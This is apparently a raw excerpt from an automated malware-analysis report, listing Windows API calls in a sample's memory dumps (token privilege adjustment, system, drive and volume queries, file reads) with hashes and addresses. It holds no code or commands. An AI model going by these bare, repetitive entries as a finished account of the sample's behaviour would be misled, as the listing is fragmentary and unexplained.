                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F4AD37
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F4B329
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F4B329
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F4A23E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 02840819
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 028408E5
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01F4A94A
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F4AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F4BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 028408E5
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01F4A39C
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F4AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01F4AA71
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 02840819
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 4d934ccedfeb0a572db4e3bd8482c86710248a57ee54e64935ed05382e6a2a42
                                                        • Instruction ID: fafebebcb484343418a2df243419dc8604728c129fe17fbf67aa9e615f52cac9
                                                        • Opcode Fuzzy Hash: 4d934ccedfeb0a572db4e3bd8482c86710248a57ee54e64935ed05382e6a2a42
                                                        • Instruction Fuzzy Hash: F101C479500308EFFB209F11DD85BA7FB98DF04721F148096EE089B241D674A904CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 768640fd5dcc5c72fda8e199a81ac2bc272d4e23f1eb0a94c568bfbf80b5b4b2
                                                        • Instruction ID: 60c8a8bb31ca0fc18a28449350a4f115134be4402c67d5989c0a3a10433c625d
                                                        • Opcode Fuzzy Hash: 768640fd5dcc5c72fda8e199a81ac2bc272d4e23f1eb0a94c568bfbf80b5b4b2
                                                        • Instruction Fuzzy Hash: BF11AC79500704DBEB20CF15D888B66FBA4EB04624F08C4AADD09CB612D775E444CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01F4ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: e6929396b516743a13e583be46d4239adb0a529450545aafb54b1e701b9e963f
                                                        • Instruction ID: ff9aa3a121dc72c0e5705b1ff178d67ced8063324f68e79617d896ead61cf243
                                                        • Opcode Fuzzy Hash: e6929396b516743a13e583be46d4239adb0a529450545aafb54b1e701b9e963f
                                                        • Instruction Fuzzy Hash: E911C2B58093809FDB11CF65DC85B82BFA4EF02224F0980ABDD498F153D275A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F4BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: d372c164d95e72c468bb152385edab92bfe3ac3730c9106553f18177794fb959
                                                        • Instruction ID: ae2e168ce2068920c85ece1df7fc71f56efb33f2908b4c64a9dbe767d787c860
                                                        • Opcode Fuzzy Hash: d372c164d95e72c468bb152385edab92bfe3ac3730c9106553f18177794fb959
                                                        • Instruction Fuzzy Hash: 44118E72504700DFEB21CF55DC44B52FFE4FF08611F0885AADE898A612D372E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F4A23E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 5cd84816b4b21d3a1c93b095193006a6eef057ca8437f9d2bea95feef40610e7
                                                        • Instruction ID: 3054e738743159e3790a9100dd794d4ee7d71b86e9aad43b89761bc0db0f236a
                                                        • Opcode Fuzzy Hash: 5cd84816b4b21d3a1c93b095193006a6eef057ca8437f9d2bea95feef40610e7
                                                        • Instruction Fuzzy Hash: 07018471900600AFE310DF16DC46B66FBF8FB88A60F14816AED089B741D275F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 9796d2c6f514eda70713cd251488af37a5d1bfce4db7b3f6cd7e20f4f46a3d6c
                                                        • Instruction ID: 797187e0761693ed3a93817e72a227c09409798af594c0a620a47fe6ed808a82
                                                        • Opcode Fuzzy Hash: 9796d2c6f514eda70713cd251488af37a5d1bfce4db7b3f6cd7e20f4f46a3d6c
                                                        • Instruction Fuzzy Hash: F9019E79600348CFEB10DF25DC857A6FBA8EB00225F0884ABDE09CB642DB74E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: e6c4bbab59d453348e0e6ce806fb88518246d38576ff1bb458d31aa082f56329
                                                        • Instruction ID: 7ecd10290a4d08f650e61384e518857aaa832741031057f89fc803290549e2fd
                                                        • Opcode Fuzzy Hash: e6c4bbab59d453348e0e6ce806fb88518246d38576ff1bb458d31aa082f56329
                                                        • Instruction Fuzzy Hash: 75017171900600ABE310DF16DC46B66FBA8FB88A60F14816AED089B741D275B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: b39089c39d8339827f3362926432a508317b1492188e21338caca2cc07185866
                                                        • Instruction ID: 552316724a6fa6ef27fd173e4815717f106e7da57edfa931e2fb014bc4b2546b
                                                        • Opcode Fuzzy Hash: b39089c39d8339827f3362926432a508317b1492188e21338caca2cc07185866
                                                        • Instruction Fuzzy Hash: CD01DF72900240DFEB20CF19DC897A6FFA4EF04620F08C4ABDD498B656D276E804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 9cda2f848df4082ae905eccea94ce44e0826b1657646657f0479bf2caa742136
                                                        • Instruction ID: ba7cb26e4b6895bf9d4e403ae552687380f47022be42b83ecfec105f5eac1bcb
                                                        • Opcode Fuzzy Hash: 9cda2f848df4082ae905eccea94ce44e0826b1657646657f0479bf2caa742136
                                                        • Instruction Fuzzy Hash: 4201BC79500344DFEF209F15DC897AAFBA4EF04628F08C4AADD0DCBA42D679A444CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01F4A94A
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 0db3e58c32ac200f8caa0d6c5b9cced1dc6d2b7c18d617cd147c7b992e1c9f3e
                                                        • Instruction ID: 86a943db705a2318fc65992fecb4c25d47f231a9ea4bc051645ea195fe932ffc
                                                        • Opcode Fuzzy Hash: 0db3e58c32ac200f8caa0d6c5b9cced1dc6d2b7c18d617cd147c7b992e1c9f3e
                                                        • Instruction Fuzzy Hash: 26016271900600ABD310DF16DC46B26FBB4FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: dbdd3beaf238489163fc0bbd02e67d3fb0edbe647d8f553063fb688c64e7be3f
                                                        • Instruction ID: 37daed1ed198a8284429f68766c8178395ff3e76cca102317d2b855a2a158d7d
                                                        • Opcode Fuzzy Hash: dbdd3beaf238489163fc0bbd02e67d3fb0edbe647d8f553063fb688c64e7be3f
                                                        • Instruction Fuzzy Hash: B5016271900600EBD310DF16DC46B26FBB4FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: bf469a16b0305d0d9cbbe61772117aee7a55df7e35794424342f0f6b0a4eb84f
                                                        • Instruction ID: acdccf73ab9fb611d93df68ca6eed5265a99db910a4e2f4087db41d387ac52c4
                                                        • Opcode Fuzzy Hash: bf469a16b0305d0d9cbbe61772117aee7a55df7e35794424342f0f6b0a4eb84f
                                                        • Instruction Fuzzy Hash: 09017C79504348DFEB10DF15D885B66FBA4EB04664F0885AADE08CFA86D779E404CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 429793f4456cd2beb6aebc2b2282b8626742e258b8194765b9725478181fa65a
                                                        • Instruction ID: c374187f90edc03654947f091e319626faae6b275ee6ec591f753f76098a8d04
                                                        • Opcode Fuzzy Hash: 429793f4456cd2beb6aebc2b2282b8626742e258b8194765b9725478181fa65a
                                                        • Instruction Fuzzy Hash: 1C01F479500748CFEB108F15D885766FBA0EF45624F08C0ABDE0A8B753D775E404DEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01F4ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 853a7d1a1f3447f09c7395698f187c2c255c3e44744aba5d5f5bee68fb4a9ed3
                                                        • Instruction ID: 1f3132b349afe6300959c5800b8132659c17ffbb5a7ce61e2570a2f11eee9f41
                                                        • Opcode Fuzzy Hash: 853a7d1a1f3447f09c7395698f187c2c255c3e44744aba5d5f5bee68fb4a9ed3
                                                        • Instruction Fuzzy Hash: BB01FF31804740CFEB10DF59DC89BA2FFA4EF04224F08C4ABDD0A8F202D276A404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: cdc4f7ae463e8d58695d581c9db6ea0d80d2850ae3a09e909e8e570094557564
                                                        • Instruction ID: 9c19b22f45f4dc10dd7c3a47e2377a0a1a35074d54d3760914b192096838a7a7
                                                        • Opcode Fuzzy Hash: cdc4f7ae463e8d58695d581c9db6ea0d80d2850ae3a09e909e8e570094557564
                                                        • Instruction Fuzzy Hash: 17F0AF39500748DFEB20DF05D889766FBA4EF05A25F08C19ADD4D8B712DA75A484CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01F4A39C
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: de89cfc44530ba534da961d894426f48536a40710bd6a2c18bd0c4e3c22504fb
                                                        • Instruction ID: 1d6c00467eb738d351bf177b9ad1ba51eee166cffbaef5b80b4b9c9733efaa6f
                                                        • Opcode Fuzzy Hash: de89cfc44530ba534da961d894426f48536a40710bd6a2c18bd0c4e3c22504fb
                                                        • Instruction Fuzzy Hash: CBF0C235904740DFEB20DF05D889765FFA0EF04721F08C09ADD4A4B752E3B6E404CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: a68370fd89df991f6efdbc09563f68ecc29a6f2b8d160ef8fff98050083be331
                                                        • Instruction ID: c6ae11b589e9cfd3a0eb0672fea385b2ad6a72b8131cc27aafbff38c0357657e
                                                        • Opcode Fuzzy Hash: a68370fd89df991f6efdbc09563f68ecc29a6f2b8d160ef8fff98050083be331
                                                        • Instruction Fuzzy Hash: 16F0C239504748DFEB20DF15D889766FFA0EF14726F08C09ADE498B716D775A404CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01F4AA71
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 11d7694d4372aad953be8df75e05c41a83c132579186efe6d24513bd2034faee
                                                        • Instruction ID: ba9b36f031cf15aa9ede97fab5a5f27365244353be1b37285f9fd13ea6d86371
                                                        • Opcode Fuzzy Hash: 11d7694d4372aad953be8df75e05c41a83c132579186efe6d24513bd2034faee
                                                        • Instruction Fuzzy Hash: 8CF0C231940740CFEB10DF05D989761FFA4EF04621F08C09ADD0A4F742D276A508CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01F4A9C8
